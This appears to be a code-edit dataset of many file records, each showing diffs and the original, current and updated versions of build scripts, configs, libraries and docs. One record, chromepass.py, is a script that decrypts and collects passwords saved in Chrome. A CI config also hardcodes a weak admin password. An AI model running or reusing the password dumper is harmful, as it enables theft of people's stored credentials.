link_label = resource.code
link_label << " : #{resource.summary}" if resource.summary.present?
link_to(link_label, project_bx_resource_path(resource.project_id, resource))
else
""
e... | <|file_sep|>lib/bx_wiki_macros.rb.diff
original:
updated:
desc "Links to resource page.\n_Example:_\n\n {{bx_resource(3)}}"
<|file_sep|>original/lib/bx_wiki_macros.rb
resource = BxResourceNode.where(:id => resource_id).first
if resource
link_label = resource.code
link_label << " : #{resource.sum... | 18c84a8d87a1e881c5ac704ecd337884cc8acc84 | lib/bx_wiki_macros.rb | lib/bx_wiki_macros.rb | Ruby |
<|file_sep|>build-win.bat.diff
original:
echo Building X-Mem for Windows x86-64...
updated:
set ARCH=%1
echo Building X-Mem for Windows on %ARCH%...
<|file_sep|>build-win.bat.diff
original:
call scons -f SConstruct_win_x64
updated:
call scons -f SConstruct_win_%ARCH%
<|file_sep|>original/build-win.bat
:: DO NOT remove ... | :: DO NOT remove this code -- otherwise X-Mem will fail to build.
set build_datetime=%DATE% %TIME%
echo #ifndef __BUILD_DATETIME_H>src\include\build_datetime.h
echo #define __BUILD_DATETIME_H>>src\include\build_datetime.h
echo #define BUILD_DATETIME "%build_datetime%">>src\include\build_datetime.h
echo #endif>>src\incl... | <|file_sep|>build-win.bat.diff
original:
echo Building X-Mem for Windows x86-64...
updated:
set ARCH=%1
echo Building X-Mem for Windows on %ARCH%...
<|file_sep|>build-win.bat.diff
original:
call scons -f SConstruct_win_x64
updated:
call scons -f SConstruct_win_%ARCH%
<|file_sep|>original/build-win.bat
:: DO NOT remove ... | 08f5a1f1bca75ba02ef9b3cdd0ce45dbd93a637a | build-win.bat | build-win.bat | Batchfile |
<|file_sep|>original/setup.py
#!/usr/bin/env python
from setuptools import setup, find_packages
def readme():
with open('README.rst') as f:
return f.read()
setup(
name='django-mailer-server-backend',
version='0.1.3',
description="A django mail backend for mailer server (https://github.com/spap... | #!/usr/bin/env python
from setuptools import setup, find_packages
def readme():
with open('README.rst') as f:
return f.read()
setup(
name='django-mailer-server-backend',
version='0.1.4',
description="A django mail backend for mailer server (https://github.com/spapas/mailer_server)",
long_d... | <|file_sep|>original/setup.py
#!/usr/bin/env python
from setuptools import setup, find_packages
def readme():
with open('README.rst') as f:
return f.read()
setup(
name='django-mailer-server-backend',
version='0.1.3',
description="A django mail backend for mailer server (https://github.com/spap... | 86d1bb54b3429b0e1c91e2f387c74e7858e31d72 | setup.py | setup.py | Python |
<|file_sep|>original/package.json
"name": "my-website",
"version": "5.0.0",
"author": "David Minnerly",
"license": "MIT",
"homepage": "https://github.com/VoxelDavid/voxeldavid-website",
"repository": {
"type": "git",
"url": "git://github.com/VoxelDavid/voxeldavid.git"
},
"bugs": {
"url": "ht... | "name": "my-website",
"version": "5.0.0",
"author": "David Minnerly",
"license": "MIT",
"homepage": "https://github.com/VoxelDavid/voxeldavid-website",
"repository": {
"type": "git",
"url": "git://github.com/VoxelDavid/voxeldavid.git"
},
"bugs": {
"url": "https://github.com/VoxelDavid/voxeld... | <|file_sep|>original/package.json
"name": "my-website",
"version": "5.0.0",
"author": "David Minnerly",
"license": "MIT",
"homepage": "https://github.com/VoxelDavid/voxeldavid-website",
"repository": {
"type": "git",
"url": "git://github.com/VoxelDavid/voxeldavid.git"
},
"bugs": {
"url": "ht... | 51ae1a15ed89ccb5dfbee5061dec396d03ab7983 | package.json | package.json | JSON |
<|file_sep|>original/trunk/org.mwc.debrief.core/intro_content/debrief_overview.xml
<?xml version="1.0" encoding="utf-8" ?>
<introContent>
<extensionContent id="orgmwcdebriefcore-introExtension"
style="css/intro.css" name="Sample Extension" path="overview/@">
<group style-id="content-group"
id="orgmwcdebriefcore... | <?xml version="1.0" encoding="utf-8" ?>
<introContent>
<extensionContent id="orgmwcdebriefcore-introExtension"
style="css/intro.css" name="Sample Extension" path="overview/@">
<group style-id="content-group"
id="orgmwcdebriefcore-introLink-group">
<link style-id="content-link" label="History of Debrief"
... | <|file_sep|>original/trunk/org.mwc.debrief.core/intro_content/debrief_overview.xml
<?xml version="1.0" encoding="utf-8" ?>
<introContent>
<extensionContent id="orgmwcdebriefcore-introExtension"
style="css/intro.css" name="Sample Extension" path="overview/@">
<group style-id="content-group"
id="orgmwcdebriefcore... | 5d7e98df3254a16cead80a052ac6533dc7b66932 | trunk/org.mwc.debrief.core/intro_content/debrief_overview.xml | trunk/org.mwc.debrief.core/intro_content/debrief_overview.xml | XML |
<|file_sep|>original/README-BCC.rst
<|file_sep|>current/README-BCC.rst
<|file_sep|>updated/README-BCC.rst | ###
BCC
###
This version of PgBouncer allows you to configure BCC
connections (Blind Carbon Copy, as in email) along with the
usual connection. When configured, the corresponding
postgres instance will receive all the same input as the
main instance. The output of the BCC instance is ignored.
::
┏━━━━━┓ ┏━━━━━━... | <|file_sep|>original/README-BCC.rst
<|file_sep|>current/README-BCC.rst
<|file_sep|>updated/README-BCC.rst
###
BCC
###
This version of PgBouncer allows you to configure BCC
connections (Blind Carbon Copy, as in email) along with the
usual connection. When configured, the corresponding
postgres instance will receive a... | 547568345dadee0e5ab41d943b19f0497fdabb7d | README-BCC.rst | README-BCC.rst | reStructuredText |
<|file_sep|>original/web-app/test/text_area.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Text Area Test</title>
<meta name="viewport" content="width=320; init... |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Text Area Test</title>
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-s... | <|file_sep|>original/web-app/test/text_area.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Text Area Test</title>
<meta name="viewport" content="width=320; init... | 8995a7eef7f4b5659c9fddd8c8690272a0e2de8f | web-app/test/text_area.html | web-app/test/text_area.html | HTML |
<|file_sep|>original/src/algorithm/boj/Boj10809.java
<|file_sep|>current/src/algorithm/boj/Boj10809.java
<|file_sep|>updated/src/algorithm/boj/Boj10809.java | /*
* Copyright 2017 haeun kim
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to i... | <|file_sep|>original/src/algorithm/boj/Boj10809.java
<|file_sep|>current/src/algorithm/boj/Boj10809.java
<|file_sep|>updated/src/algorithm/boj/Boj10809.java
/*
* Copyright 2017 haeun kim
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the L... | 2905b2f0315ecd4b9d815faaea0ed6e670e344f2 | src/algorithm/boj/Boj10809.java | src/algorithm/boj/Boj10809.java | Java |
<|file_sep|>original/gradle.properties
#Tue, 19 May 2015 17:15:25 -0700
group=ai.h2o
version=1.6.99999-SNAPSHOT
# Major version of H2O release
h2oMajorVersion=3.8.2
# Name of H2O major version
h2oMajorName=turchin
# H2O Build version, defined here to be overriden by -P option
h2oBuild=2
# Spark version
sparkVersion=1.6... | #Tue, 19 May 2015 17:15:25 -0700
group=ai.h2o
version=1.6.99999-SNAPSHOT
# Major version of H2O release
h2oMajorVersion=3.8.2
# Name of H2O major version
h2oMajorName=turchin
# H2O Build version, defined here to be overriden by -P option
h2oBuild=3
# Spark version
sparkVersion=1.6.1
org.gradle.jvmargs='-XX:MaxPermSize... | <|file_sep|>original/gradle.properties
#Tue, 19 May 2015 17:15:25 -0700
group=ai.h2o
version=1.6.99999-SNAPSHOT
# Major version of H2O release
h2oMajorVersion=3.8.2
# Name of H2O major version
h2oMajorName=turchin
# H2O Build version, defined here to be overriden by -P option
h2oBuild=2
# Spark version
sparkVersion=1.6... | d137426d51d29a2155bd5ec76df055463299503d | gradle.properties | gradle.properties | INI |
<|file_sep|>src/utils.h.diff
original:
void *advancePtr(void *vp, SizeType len) {
updated:
inline void *advancePtr(void *vp, SizeType len) {
<|file_sep|>original/src/utils.h
#ifndef _INC_UTILS_H
#define _INC_UTILS_H
#include "basetypes.h"
void *advancePtr(void *vp, SizeType len) {
return (void*)((unsigned char *)... | #ifndef _INC_UTILS_H
#define _INC_UTILS_H
#include "basetypes.h"
inline void *advancePtr(void *vp, SizeType len) {
return (void*)((unsigned char *)(vp) + len);
}
inline const void *advancePtr(const void *vp, SizeType len) {
return (void*)((unsigned char *)(vp) + len);
}
#endif//_INC_UTILS_H | <|file_sep|>src/utils.h.diff
original:
void *advancePtr(void *vp, SizeType len) {
updated:
inline void *advancePtr(void *vp, SizeType len) {
<|file_sep|>original/src/utils.h
#ifndef _INC_UTILS_H
#define _INC_UTILS_H
#include "basetypes.h"
void *advancePtr(void *vp, SizeType len) {
return (void*)((unsigned char *)... | d4ea2ac1a1bbf61ed190ac9b6e78d6be4ce687f6 | src/utils.h | src/utils.h | C |
<|file_sep|>lib/utilities/createHead.js.diff
original:
updated:
const {dirname} = require('path');
<|file_sep|>original/lib/utilities/createHead.js
const writeFile = require('./writeFile');
const writeTag = require('./writeTag');
module.exports = (config, head) => {
let output = '';
const createTag = (tag) => {
... | const writeFile = require('./writeFile');
const writeTag = require('./writeTag');
module.exports = (config, head) => {
let output = '';
const createTag = (tag) => {
output += writeTag(config, tag);
};
for (const platform in head) {
if (head.hasOwnProperty(platform)) {
head[platform].forEach(cre... | <|file_sep|>lib/utilities/createHead.js.diff
original:
updated:
const {dirname} = require('path');
<|file_sep|>original/lib/utilities/createHead.js
const writeFile = require('./writeFile');
const writeTag = require('./writeTag');
module.exports = (config, head) => {
let output = '';
const createTag = (tag) => {
... | 4a77c23e714b2ad672ca190ad4d53b68a056eeef | lib/utilities/createHead.js | lib/utilities/createHead.js | JavaScript |
<|file_sep|>original/setup.cfg
[build_sphinx]
config-dir = doc
source-dir = doc
build-dir = build/doc
builder = html
all_files = 1
<|file_sep|>current/setup.cfg
[build_sphinx]
config-dir = doc
source-dir = doc
build-dir = build/doc
builder = html
all_files = 1
<|file_sep|>updated/setup.cfg | [build_sphinx]
config-dir = doc
source-dir = doc
build-dir = build/doc
builder = html
all_files = 1
[coverage:run]
branch = True
source = clique | <|file_sep|>original/setup.cfg
[build_sphinx]
config-dir = doc
source-dir = doc
build-dir = build/doc
builder = html
all_files = 1
<|file_sep|>current/setup.cfg
[build_sphinx]
config-dir = doc
source-dir = doc
build-dir = build/doc
builder = html
all_files = 1
<|file_sep|>updated/setup.cfg
[build_sphinx]
config-dir = d... | 9f58a739e8704e1e2a5a33c4db01927b78f5597b | setup.cfg | setup.cfg | INI |
<|file_sep|>original/tmux_spectrator_resize.patch
<|file_sep|>current/tmux_spectrator_resize.patch
<|file_sep|>updated/tmux_spectrator_resize.patch | --- tmux-1.9a-orig/resize.c 2014-02-23 02:48:37.000000000 +0600
+++ tmux-1.9a-mod/resize.c 2014-04-18 20:54:06.000000000 +0600
@@ -58,7 +58,7 @@
ssx = ssy = UINT_MAX;
for (j = 0; j < ARRAY_LENGTH(&clients); j++) {
c = ARRAY_ITEM(&clients, j);
- ... | <|file_sep|>original/tmux_spectrator_resize.patch
<|file_sep|>current/tmux_spectrator_resize.patch
<|file_sep|>updated/tmux_spectrator_resize.patch
--- tmux-1.9a-orig/resize.c 2014-02-23 02:48:37.000000000 +0600
+++ tmux-1.9a-mod/resize.c 2014-04-18 20:54:06.000000000 +0600
@@ -58,7 +58,7 @@
s... | 7091f77f21fe29d16595f6e8f649b27668b153fc | tmux_spectrator_resize.patch | tmux_spectrator_resize.patch | Diff |
<|file_sep|>original/lib/arpoador.dart
library arpoador;
import 'dart:io';
import 'dart:typed_data';
class Momentum {
static listen({port: 8777, address: "127.0.0.1",
handler(socket)}) {
var server = new ServerSocket(address, port);
while (true) {
server.spawnAccept(handler);
}
}
stat... | library arpoador;
import 'dart:io';
import 'dart:typed_data';
class Momentum {
/// For now, the handler callback should be a static method or function.
/// It seems that instance methods don't work as handler callbacks yet.
static listen({port: 8777, address: "127.0.0.1",
handler(socket)}) {
var ser... | <|file_sep|>original/lib/arpoador.dart
library arpoador;
import 'dart:io';
import 'dart:typed_data';
class Momentum {
static listen({port: 8777, address: "127.0.0.1",
handler(socket)}) {
var server = new ServerSocket(address, port);
while (true) {
server.spawnAccept(handler);
}
}
stat... | 19cfd812dc315b58478cd9e2dda93a8bde0bf445 | lib/arpoador.dart | lib/arpoador.dart | Dart |
<|file_sep|>.travis.yml.diff
original:
updated:
- "0.10"
<|file_sep|>original/.travis.yml
language: node_js
node_js:
- "0.11"
- "0.10"
<|file_sep|>current/.travis.yml
language: node_js
node_js:
- "0.10"
- "0.11"
- "0.10"
<|file_sep|>updated/.travis.yml | language: node_js
node_js:
- "0.10"
- "0.11"
script: "node ./node_modules/mocha/bin/mocha -u bdd -R spec --compilers coffee:coffee-script" | <|file_sep|>.travis.yml.diff
original:
updated:
- "0.10"
<|file_sep|>original/.travis.yml
language: node_js
node_js:
- "0.11"
- "0.10"
<|file_sep|>current/.travis.yml
language: node_js
node_js:
- "0.10"
- "0.11"
- "0.10"
<|file_sep|>updated/.travis.yml
language: node_js
node_js:
- "0.10"
- "0.11"
scrip... | 6ba48556a10ec9aade256952208f388bdab74fc1 | .travis.yml | .travis.yml | YAML |
<|file_sep|>original/packer/aws.json
},
"builders": [{
"type": "amazon-ebs",
"region": "us-east-1",
"source_ami": "ami-9a562df2",
"instance_type": "m3.medium",
"ssh_username": "ubuntu",
"ami_name": "graylog-{{user `package_version`}}",
"ami_description": "Full-stack installation of Grayl... | },
"builders": [{
"type": "amazon-ebs",
"region": "us-east-1",
"source_ami": "ami-9a562df2",
"instance_type": "m3.medium",
"ssh_username": "ubuntu",
"ami_name": "graylog-{{user `package_version`}}",
"ami_description": "Full-stack installation of Graylog - maintained by Graylog, Inc.",
... | <|file_sep|>original/packer/aws.json
},
"builders": [{
"type": "amazon-ebs",
"region": "us-east-1",
"source_ami": "ami-9a562df2",
"instance_type": "m3.medium",
"ssh_username": "ubuntu",
"ami_name": "graylog-{{user `package_version`}}",
"ami_description": "Full-stack installation of Grayl... | 2f4236f6a3162e032868367de1eacb15f3aa3918 | packer/aws.json | packer/aws.json | JSON |
<|file_sep|>original/jenkins/jobs/projects.yaml
- project:
name: sandbox
github-org: openstack-dev
node: master
vendor: ITRI DISCO CI
jobs:
- noop-check-communication
- dsvm-tempest-full:
node: 'devstack_slave || devstack-precise-check || d-p-c'
- dsvm-tempest-my... | - project:
name: sandbox
github-org: openstack-dev
node: master
vendor: ITRI DISCO CI
jobs:
- noop-check-communication
node: 'd-p-c'
- dsvm-tempest-full:
node: 'devstack_slave || devstack-precise-check || d-p-c'
- dsvm-tempest-my-cinder-driver:
... | <|file_sep|>original/jenkins/jobs/projects.yaml
- project:
name: sandbox
github-org: openstack-dev
node: master
vendor: ITRI DISCO CI
jobs:
- noop-check-communication
- dsvm-tempest-full:
node: 'devstack_slave || devstack-precise-check || d-p-c'
- dsvm-tempest-my... | 5803f65a37d16dec79e3c8fde3340b8c5c1c1daa | jenkins/jobs/projects.yaml | jenkins/jobs/projects.yaml | YAML |
<|file_sep|>original/spec/dummy/app/views/layouts/application.html.erb
<%# blocks for govuk_admin_template %>
<% content_for :page_title do %>page_title<% end %>
<% content_for :app_title do %>app_title<% end %>
<% content_for :head do %>
<%= stylesheet_link_tag "application", :media => "all" %>
<%= javascript_incl... | <%# blocks for govuk_admin_template %>
<% content_for :page_title do %>page_title<% end %>
<% content_for :app_title do %>app_title<% end %>
<% content_for :head do %>
<%= stylesheet_link_tag "application", :media => "all" %>
<%= javascript_include_tag "application" %>
<% end %>
<% content_for :navbar_items do %>
... | <|file_sep|>original/spec/dummy/app/views/layouts/application.html.erb
<%# blocks for govuk_admin_template %>
<% content_for :page_title do %>page_title<% end %>
<% content_for :app_title do %>app_title<% end %>
<% content_for :head do %>
<%= stylesheet_link_tag "application", :media => "all" %>
<%= javascript_incl... | 144b773639ad5c50c4df478d6739e55627a65f64 | spec/dummy/app/views/layouts/application.html.erb | spec/dummy/app/views/layouts/application.html.erb | HTML+ERB |
<|file_sep|>original/.drone.yml
build:
build_starting:
image: python:2
commands:
- echo "Beginning new build"
run_tests:
image: python:2-alpine
commands:
- pip install -r roomfinder_web/requirements.txt
- python testing.py
<|file_sep|>current/.drone.yml
build:... | build:
build_starting:
image: python:2
commands:
- echo "Beginning new build"
run_tests:
image: python:2-alpine
commands:
- pip install -r roomfinder_web/requirements.txt
- python testing.py
publish:
docker:
repo: $$DOCKER_USERNAME/roomfinder_web
... | <|file_sep|>original/.drone.yml
build:
build_starting:
image: python:2
commands:
- echo "Beginning new build"
run_tests:
image: python:2-alpine
commands:
- pip install -r roomfinder_web/requirements.txt
- python testing.py
<|file_sep|>current/.drone.yml
build:... | 1727796f9a0a248ffbe1b46025c3a0cca1ae1018 | .drone.yml | .drone.yml | YAML |
<|file_sep|>src/web/styles/colors.less.diff
original:
updated:
// Greyscale
<|file_sep|>src/web/styles/colors.less.diff
original:
@light-grey: #F1F1F1;
updated:
@lighter-grey: #F1F1F1;
@light-grey: #ABABAB;
<|file_sep|>src/web/styles/colors.less.diff
original:
updated:
// Greens
<|file_sep|>original/src/web/styles/... | // Color Palette
// Greyscale
@white: #FFFFFF;
@black: #000000;
@lighter-grey: #F1F1F1;
@light-grey: #ABABAB;
@dark-grey: #707070;
// Greens
@green: #53B53B;
@light-green: #BCF5BC;
// Reds
@lighter-red: #FF8080;
@light-red: #FF1A1A;
@dark-red: #CC0000;
@red-shadow: #330000; | <|file_sep|>src/web/styles/colors.less.diff
original:
updated:
// Greyscale
<|file_sep|>src/web/styles/colors.less.diff
original:
@light-grey: #F1F1F1;
updated:
@lighter-grey: #F1F1F1;
@light-grey: #ABABAB;
<|file_sep|>src/web/styles/colors.less.diff
original:
updated:
// Greens
<|file_sep|>original/src/web/styles/... | a23bccee59cda1af3f1d1b1146e56d42678d62e7 | src/web/styles/colors.less | src/web/styles/colors.less | Less |
<|file_sep|>original/Torch.Mod/TorchModCore.cs
if (messageText == "@!debug")
{
Debug = !Debug;
MyAPIGateway.Utilities.ShowMessage("Torch", $"Debug: {Debug}");
sendToOthers = false;
}
}
protected override void UnloadData... | {
Debug = !Debug;
MyAPIGateway.Utilities.ShowMessage("Torch", $"Debug: {Debug}");
sendToOthers = false;
}
}
protected override void UnloadData()
{
try
{
MyAPIGateway.Utilities.Message... | <|file_sep|>original/Torch.Mod/TorchModCore.cs
if (messageText == "@!debug")
{
Debug = !Debug;
MyAPIGateway.Utilities.ShowMessage("Torch", $"Debug: {Debug}");
sendToOthers = false;
}
}
protected override void UnloadData... | 1a1f8b223500d5186b962fc94abbeab1d8441c9e | Torch.Mod/TorchModCore.cs | Torch.Mod/TorchModCore.cs | C# |
<|file_sep|>css/embedvideo.css.diff
original:
updated:
/* @noflip */
<|file_sep|>original/css/embedvideo.css
margin-left: auto;
margin-right: auto;
}
div.embedvideo.ev_left {
clear: left;
float: left;
}
div.embedvideo.ev_right {
clear: right;
float: right;
}
div.embedvideo.ev_inline {
display: inline-block;
... | margin-left: auto;
margin-right: auto;
}
/* @noflip */
div.embedvideo.ev_left {
clear: left;
float: left;
}
/* @noflip */
div.embedvideo.ev_right {
clear: right;
float: right;
}
div.embedvideo.ev_inline {
display: inline-block;
}
div.embedvideo.ev_top { | <|file_sep|>css/embedvideo.css.diff
original:
updated:
/* @noflip */
<|file_sep|>original/css/embedvideo.css
margin-left: auto;
margin-right: auto;
}
div.embedvideo.ev_left {
clear: left;
float: left;
}
div.embedvideo.ev_right {
clear: right;
float: right;
}
div.embedvideo.ev_inline {
display: inline-block;
... | 10ef5abebfe85546595fbde71c7e41413a59432e | css/embedvideo.css | css/embedvideo.css | CSS |
<|file_sep|>original/src/plugins/qt4projectmanager/qt-maemo/qt-maemo.pri
SUPPORT_QT_MAEMO = $$(QTCREATOR_WITH_MAEMO)
!isEmpty(SUPPORT_QT_MAEMO) {
message("Adding experimental support for Qt/Maemo applications.")
DEFINES += QTCREATOR_WITH_MAEMO
# DEFINES += USE_SSH_LIB
# INCLUDEPATH += $$PWD/../../../libs... | SUPPORT_QT_MAEMO = $$(QTCREATOR_WITH_MAEMO)
!isEmpty(SUPPORT_QT_MAEMO) {
message("Adding experimental support for Qt/Maemo applications.")
DEFINES += QTCREATOR_WITH_MAEMO
DEFINES += USE_SSH_LIB
INCLUDEPATH += $$PWD/../../../libs/3rdparty/net7ssh/src
INCLUDEPATH += $$PWD/../../../libs/3rdparty/botan... | <|file_sep|>original/src/plugins/qt4projectmanager/qt-maemo/qt-maemo.pri
SUPPORT_QT_MAEMO = $$(QTCREATOR_WITH_MAEMO)
!isEmpty(SUPPORT_QT_MAEMO) {
message("Adding experimental support for Qt/Maemo applications.")
DEFINES += QTCREATOR_WITH_MAEMO
# DEFINES += USE_SSH_LIB
# INCLUDEPATH += $$PWD/../../../libs... | 3b7527de2eb7a8e06fc3f2943310198202319d90 | src/plugins/qt4projectmanager/qt-maemo/qt-maemo.pri | src/plugins/qt4projectmanager/qt-maemo/qt-maemo.pri | QMake |
<|file_sep|>original/.github/ISSUE_TEMPLATE/bug_report.md
<|file_sep|>current/.github/ISSUE_TEMPLATE/bug_report.md
<|file_sep|>updated/.github/ISSUE_TEMPLATE/bug_report.md | ---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''
---
**Describe the bug**
[A clear and concise description of what the bug is.]
**Setup**
I am running version [insert version] from [source] with the following dynesty setup:
[insert a copy of the dynesty code used duri... | <|file_sep|>original/.github/ISSUE_TEMPLATE/bug_report.md
<|file_sep|>current/.github/ISSUE_TEMPLATE/bug_report.md
<|file_sep|>updated/.github/ISSUE_TEMPLATE/bug_report.md
---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''
---
**Describe the bug**
[A clear and concise ... | ec6d4ee6c59cb874d3d2b40c3036c4bec0c3a173 | .github/ISSUE_TEMPLATE/bug_report.md | .github/ISSUE_TEMPLATE/bug_report.md | Markdown |
<|file_sep|>original/Examples/copy_binaries.cmd
if exist yc (
rd /s /q yc )
mkdir yc
xcopy /Y ..\YaccConstructor\YaccConstructor\bin\Release\*.dll yc
xcopy /Y ..\YaccConstructor\YaccConstructor\bin\Release\*.exe yc
xcopy /Y ..\YaccConstructor\CYK\bin\Release\*.exe yc
xcopy /Y ..\YaccConstructor\CYK\bin\Release\*... | if exist yc (
rd /s /q yc )
mkdir yc
xcopy /Y ..\YaccConstructor\YaccConstructor\bin\Release\*.dll yc
xcopy /Y ..\YaccConstructor\YaccConstructor\bin\Release\*.exe yc
xcopy /Y ..\YaccConstructor\CYK\bin\Release\*.exe yc
xcopy /Y ..\YaccConstructor\GLLGenerator\bin\Release\*.dll yc
xcopy /Y ..\YaccConstructor\CYK... | <|file_sep|>original/Examples/copy_binaries.cmd
if exist yc (
rd /s /q yc )
mkdir yc
xcopy /Y ..\YaccConstructor\YaccConstructor\bin\Release\*.dll yc
xcopy /Y ..\YaccConstructor\YaccConstructor\bin\Release\*.exe yc
xcopy /Y ..\YaccConstructor\CYK\bin\Release\*.exe yc
xcopy /Y ..\YaccConstructor\CYK\bin\Release\*... | 1e387c17ea2020ed603ae33b84c7549252bfb51f | Examples/copy_binaries.cmd | Examples/copy_binaries.cmd | Batchfile |
<|file_sep|>chromepass.py.diff
original:
csv_file = open("chromepass.csv",'wb')
csv_file.write("link,username,password\n".encode('utf-8'))
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Googl... | # chrome encrypts the password with Windows WinCrypt.
# Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': information[0],
'u... | <|file_sep|>chromepass.py.diff
original:
csv_file = open("chromepass.csv",'wb')
csv_file.write("link,username,password\n".encode('utf-8'))
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Googl... | 2ce08224bc87ae34f546211c80d2b89a38acd0ec | chromepass.py | chromepass.py | Python |
<|file_sep|>original/install-packages.sh
brew install fzf
brew install ripgrep
brew install fd
brew install google-cloud-sdk
brew install sf-pwgen
# application software in casks
brew install --cask moom
brew install --cask 1password
brew install --cask google-chrome
brew install --cask google-drive
brew install --cas... | brew install ripgrep
brew install fd
brew install google-cloud-sdk
brew install sf-pwgen
# application software in casks
brew install --cask moom
brew install --cask 1password
brew install --cask google-chrome
brew install --cask google-drive
brew install --cask bbedit
brew install --cask snagit
# nerdfonts and symbo... | <|file_sep|>original/install-packages.sh
brew install fzf
brew install ripgrep
brew install fd
brew install google-cloud-sdk
brew install sf-pwgen
# application software in casks
brew install --cask moom
brew install --cask 1password
brew install --cask google-chrome
brew install --cask google-drive
brew install --cas... | a3bb8dc2fbf1cd415bb31de06269cd6fc3402c3f | install-packages.sh | install-packages.sh | Shell |
<|file_sep|>original/.travis.yml
language: python
python:
- "2.7"
before_install:
- mysql -e 'CREATE DATABASE dbaas;'
install:
- pip install -r requirements_test.txt
services:
- mysql
- mongodb
- redis-server
script:
- make test
<|file_sep|>current/.travis.yml
language: python
python:
... | language: python
python:
- "2.7"
before_install:
- mysql -e 'CREATE DATABASE dbaas;'
install:
- pip install -r requirements_test.txt
services:
- mysql
- mongodb
- redis-server
before_script:
- mongo admin --eval 'db.createUser( { user: "admin", pwd: "123456", roles: [ "userAdminAnyDatabas... | <|file_sep|>original/.travis.yml
language: python
python:
- "2.7"
before_install:
- mysql -e 'CREATE DATABASE dbaas;'
install:
- pip install -r requirements_test.txt
services:
- mysql
- mongodb
- redis-server
script:
- make test
<|file_sep|>current/.travis.yml
language: python
python:
... | 065956ded5eaf98e5dce209dc4977164f2b2d563 | .travis.yml | .travis.yml | YAML |
<|file_sep|>chrome/browser/ui/touch/frame/browser_non_client_frame_view_factory_touch.cc.diff
original:
updated:
#include "base/command_line.h"
#include "chrome/browser/ui/panels/panel_browser_frame_view.h"
#include "chrome/browser/ui/panels/panel_browser_view.h"
<|file_sep|>chrome/browser/ui/touch/frame/browser_non_c... | #include "chrome/browser/ui/views/frame/popup_non_client_frame_view.h"
#include "chrome/common/chrome_switches.h"
namespace browser {
BrowserNonClientFrameView* CreateBrowserNonClientFrameView(
BrowserFrame* frame, BrowserView* browser_view) {
Browser::Type type = browser_view->browser()->type();
switch (type... | <|file_sep|>chrome/browser/ui/touch/frame/browser_non_client_frame_view_factory_touch.cc.diff
original:
updated:
#include "base/command_line.h"
#include "chrome/browser/ui/panels/panel_browser_frame_view.h"
#include "chrome/browser/ui/panels/panel_browser_view.h"
<|file_sep|>chrome/browser/ui/touch/frame/browser_non_c... | e36045c6a1eb79fd53058fd26ba9c8ec5fce4c70 | chrome/browser/ui/touch/frame/browser_non_client_frame_view_factory_touch.cc | chrome/browser/ui/touch/frame/browser_non_client_frame_view_factory_touch.cc | C++ |
<|file_sep|>original/web/impact/impact/v1/views/base_history_view.py
class BaseHistoryView(APIView):
metadata_class = ImpactMetadata
permission_classes = (
V1APIPermissions,
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def get(self, request, pk):
... |
class BaseHistoryView(APIView):
metadata_class = ImpactMetadata
permission_classes = (
V1APIPermissions,
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def get(self, request, pk):
self.instance = self.model.objects.get(pk=pk)
events = []
... | <|file_sep|>original/web/impact/impact/v1/views/base_history_view.py
class BaseHistoryView(APIView):
metadata_class = ImpactMetadata
permission_classes = (
V1APIPermissions,
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def get(self, request, pk):
... | eabefc9c3d8502e16db0bfd07889b107ca3626ff | web/impact/impact/v1/views/base_history_view.py | web/impact/impact/v1/views/base_history_view.py | Python |
<|file_sep|>original/proxyprotocol.gemspec
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'proxyprotocol/version'
Gem::Specification.new do |spec|
spec.name = "proxyprotocol"
spec.version = Proxyprotocol::VERSION
spec.authors = ["Ó... | lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'proxyprotocol/version'
Gem::Specification.new do |spec|
spec.name = "proxyprotocol"
spec.version = Proxyprotocol::VERSION
spec.authors = ["Ómar Kjartan Yasin"]
spec.email = ... | <|file_sep|>original/proxyprotocol.gemspec
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'proxyprotocol/version'
Gem::Specification.new do |spec|
spec.name = "proxyprotocol"
spec.version = Proxyprotocol::VERSION
spec.authors = ["Ó... | 0755528ed438df17384248083fa04b9b4f71f516 | proxyprotocol.gemspec | proxyprotocol.gemspec | Ruby |
<|file_sep|>original/_posts/2018-04-26-coscup-2018-community-room-cfp.markdown
<|file_sep|>current/_posts/2018-04-26-coscup-2018-community-room-cfp.markdown
<|file_sep|>updated/_posts/2018-04-26-coscup-2018-community-room-cfp.markdown | ---
layout: post
title: "COSCUP 2018 社群議程,Arch Linux Taiwan 熱烈徵稿中!"
date: 2018-04-26T10:00:00+08:00
author: "Huei-Horng Yo"
---
